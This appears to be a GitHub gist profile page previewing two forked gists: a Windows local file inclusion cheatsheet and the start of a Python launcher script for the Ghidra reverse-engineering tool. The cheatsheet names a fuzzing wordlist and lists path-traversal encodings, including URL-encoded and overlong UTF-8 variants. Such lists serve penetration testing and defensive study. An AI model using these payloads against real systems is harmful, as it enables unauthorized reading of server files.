Skip to content

Instantly share code, notes, and snippets.

View 808ale's full-sized avatar
🎯

Rafael Pimentel 808ale

🎯
View GitHub Profile
@808ale
808ale / lfi_windows.txt
Last active May 29, 2023 11:57 — forked from korrosivesec/lfi_windows.txt
[LFI - Windows Cheatsheet]
Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
Traversal encoding:
===================
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
@808ale
808ale / ghidra.py
Created September 7, 2025 14:22 — forked from liba2k/ghidra.py
Script to run Ghidra from the command line including automatic analysis and lunching Ghidra for existing projects.
#!/usr/bin/env python3
import os
import sys
import click
import subprocess
import tempfile
import itertools as IT
import select
from time import sleep